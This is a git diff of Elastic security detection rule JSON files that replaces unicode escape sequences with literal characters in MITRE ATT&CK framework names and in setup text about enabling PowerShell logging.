implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "low", "tags": [ "Domain: Endpoint", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -73,7 +73,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_3.json b/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_3.json index 4e77e9ef32b..c60b7972349 100644 --- a/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_3.json +++ b/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_3.json @@ -46,7 +46,7 @@ ], "risk_score": 21, "rule_id": "27071ea3-e806-4697-8abc-e22c92aa4293", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "low", "tags": [ "Domain: Endpoint", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -73,7 +73,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_4.json b/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_4.json index 58796c1367e..f871147fc3c 100644 --- a/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_4.json +++ b/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_4.json @@ -45,7 +45,7 @@ ], "risk_score": 21, "rule_id": "27071ea3-e806-4697-8abc-e22c92aa4293", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -72,7 +72,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/2724808c-ba5d-48b2-86d2-0002103df753_1.json b/packages/security_detection_engine/kibana/security_rule/2724808c-ba5d-48b2-86d2-0002103df753_1.json index 9aca78271aa..2131dc92eb4 100644 --- a/packages/security_detection_engine/kibana/security_rule/2724808c-ba5d-48b2-86d2-0002103df753_1.json +++ b/packages/security_detection_engine/kibana/security_rule/2724808c-ba5d-48b2-86d2-0002103df753_1.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_101.json b/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_101.json index 826dc0878bc..428b46d2532 100644 --- a/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_101.json +++ b/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_101.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_102.json b/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_102.json index 0210052594c..0a91d136e8a 100644 --- a/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_102.json +++ b/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_102.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_103.json b/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_103.json index a02c4f8f531..efbba1d7b86 100644 --- a/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_103.json +++ b/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_103.json @@ -89,7 +89,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_104.json b/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_104.json index b3ee668ddfb..46976f5e055 100644 --- a/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_104.json +++ b/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_104.json @@ -88,7 +88,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_105.json b/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_105.json index 1b8ca3ba8c8..24ef1d2ca4b 100644 --- a/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_105.json +++ b/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_105.json @@ -88,7 +88,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_106.json b/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_106.json index 983c55ab034..c9ce06e3e7e 100644 --- a/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_106.json +++ b/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_106.json @@ -89,7 +89,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_107.json b/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_107.json index bfd2ba87920..59762f79e53 100644 --- a/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_107.json +++ b/packages/security_detection_engine/kibana/security_rule/2772264c-6fb9-4d9d-9014-b416eed21254_107.json @@ -90,7 +90,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -112,7 +112,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/2783d84f-5091-4d7d-9319-9fceda8fa71b_103.json b/packages/security_detection_engine/kibana/security_rule/2783d84f-5091-4d7d-9319-9fceda8fa71b_103.json index 3e20321cf6b..fb3ed1703d6 100644 --- a/packages/security_detection_engine/kibana/security_rule/2783d84f-5091-4d7d-9319-9fceda8fa71b_103.json +++ b/packages/security_detection_engine/kibana/security_rule/2783d84f-5091-4d7d-9319-9fceda8fa71b_103.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2783d84f-5091-4d7d-9319-9fceda8fa71b_104.json b/packages/security_detection_engine/kibana/security_rule/2783d84f-5091-4d7d-9319-9fceda8fa71b_104.json index 2cb608156d8..a76f8801e6c 100644 --- a/packages/security_detection_engine/kibana/security_rule/2783d84f-5091-4d7d-9319-9fceda8fa71b_104.json +++ b/packages/security_detection_engine/kibana/security_rule/2783d84f-5091-4d7d-9319-9fceda8fa71b_104.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_101.json b/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_101.json index eb50cad9ca3..5b7dfbd8117 100644 --- a/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_101.json +++ b/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_101.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_102.json b/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_102.json index a612633abb3..df3ca05bf92 100644 --- a/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_102.json +++ b/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_102.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_104.json b/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_104.json index d7d212a6b91..caeceacb25a 100644 --- a/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_104.json +++ b/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_104.json @@ -97,7 +97,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_105.json b/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_105.json index 3f2649af97a..e150ac9ab63 100644 --- a/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_105.json +++ b/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_105.json @@ -92,7 +92,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_106.json b/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_106.json index b97a4faeaa7..4f5d4d266f3 100644 --- a/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_106.json +++ b/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_106.json @@ -91,7 +91,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_107.json b/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_107.json index 1c95e8c16c7..ddac5eb360f 100644 --- a/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_107.json +++ b/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_107.json @@ -92,7 +92,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -107,7 +107,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_104.json b/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_104.json index 6469ade281b..35629b66cb6 100644 --- a/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_104.json +++ b/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_104.json @@ -59,7 +59,7 @@ ], "risk_score": 21, "rule_id": "2856446a-34e6-435b-9fb5-f8f040bfa7ed", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_105.json b/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_105.json index 8c4ae873221..fc6547ff1ed 100644 --- a/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_105.json +++ b/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_105.json @@ -59,7 +59,7 @@ ], "risk_score": 21, "rule_id": "2856446a-34e6-435b-9fb5-f8f040bfa7ed", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_106.json b/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_106.json index 528f358a0d5..2aca4653b7f 100644 --- a/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_106.json +++ b/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_106.json @@ -59,7 +59,7 @@ ], "risk_score": 21, "rule_id": "2856446a-34e6-435b-9fb5-f8f040bfa7ed", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_107.json b/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_107.json index cf71b0f9ac6..4b640753b02 100644 --- a/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_107.json +++ b/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_107.json @@ -59,7 +59,7 @@ ], "risk_score": 21, "rule_id": "2856446a-34e6-435b-9fb5-f8f040bfa7ed", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_108.json b/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_108.json index 745f6b76f33..aea5f115282 100644 --- a/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_108.json +++ b/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_108.json @@ -59,7 +59,7 @@ ], "risk_score": 21, "rule_id": "2856446a-34e6-435b-9fb5-f8f040bfa7ed", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/2863ffeb-bf77-44dd-b7a5-93ef94b72036_100.json b/packages/security_detection_engine/kibana/security_rule/2863ffeb-bf77-44dd-b7a5-93ef94b72036_100.json index 9f5184db2af..bfb58aeb099 100644 --- a/packages/security_detection_engine/kibana/security_rule/2863ffeb-bf77-44dd-b7a5-93ef94b72036_100.json +++ b/packages/security_detection_engine/kibana/security_rule/2863ffeb-bf77-44dd-b7a5-93ef94b72036_100.json @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -62,7 +62,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/2863ffeb-bf77-44dd-b7a5-93ef94b72036_101.json b/packages/security_detection_engine/kibana/security_rule/2863ffeb-bf77-44dd-b7a5-93ef94b72036_101.json index 8888e568535..15f5f7f91be 100644 --- a/packages/security_detection_engine/kibana/security_rule/2863ffeb-bf77-44dd-b7a5-93ef94b72036_101.json +++ b/packages/security_detection_engine/kibana/security_rule/2863ffeb-bf77-44dd-b7a5-93ef94b72036_101.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -61,7 +61,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_1.json b/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_1.json index 4cccb8fb3e5..072a5a9097a 100644 --- a/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_1.json +++ b/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_1.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_2.json b/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_2.json index cb3054e59f1..d3aa6e3bfd6 100644 --- a/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_2.json +++ b/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_2.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_3.json b/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_3.json index f680ccf825b..022931b3baf 100644 --- a/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_3.json +++ b/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_3.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_4.json b/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_4.json index cc0d29c5690..a85d354c93d 100644 --- a/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_4.json +++ b/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_4.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_5.json b/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_5.json index 3c838455041..3aae88480b2 100644 --- a/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_5.json +++ b/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_5.json @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_6.json b/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_6.json index 462fa4ea99c..cd3ae332045 100644 --- a/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_6.json +++ b/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_6.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_7.json b/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_7.json index 8370a1398b3..8f4713f949d 100644 --- a/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_7.json +++ b/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_7.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_1.json b/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_1.json index 9eaa36bbda6..41792ef2003 100644 --- a/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_1.json +++ b/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_1.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_2.json b/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_2.json index babb9933123..e3f129fc486 100644 --- a/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_2.json +++ b/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_2.json @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE 